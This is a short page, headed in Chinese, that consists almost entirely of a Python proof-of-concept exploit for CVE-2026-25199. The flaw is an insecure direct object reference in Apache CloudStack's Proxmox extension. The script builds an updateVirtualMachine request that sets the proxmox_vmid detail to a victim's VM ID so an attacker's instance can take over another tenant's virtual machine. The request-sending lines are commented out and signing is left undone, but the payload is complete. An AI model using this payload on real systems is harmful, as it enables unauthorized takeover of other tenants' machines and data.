CVE-2026-25199 Apache CloudStack越权访问漏洞

#!/usr/bin/env python3 """ PoC for CVE-2026-25199: Apache CloudStack Proxmox Extension IDOR Demonstrates altering the proxmox_vmid to hijack another tenant's VM. """ import requests TARGET_API = "https://cloudstack-server:8080/client/api" API_KEY = "ATTACKER_API_KEY" SECRET_KEY = "ATTACKER_SECRET_KEY" # Attacker controls their own instance, but targets a specific Proxmox VMID ATTACKER_VM_ID = "i-3-00000001" TARGET_PROXMOX_VMID = "105" # Predicted or known victim VM ID def exploit(): payload = { "command": "updateVirtualMachine", "id": ATTACKER_VM_ID, "details[0].key": "proxmox_vmid", "details[0].value": TARGET_PROXMOX_VMID, "apikey": API_KEY, "response": "json" } # In a real scenario, sign the request with SECRET_KEY print(f"[*] Sending request to bind VM {ATTACKER_VM_ID} to Proxmox ID {TARGET_PROXMOX_VMID}") # r = requests.get(TARGET_API, params=payload) # print(r.text) if __name__ == "__main__": exploit()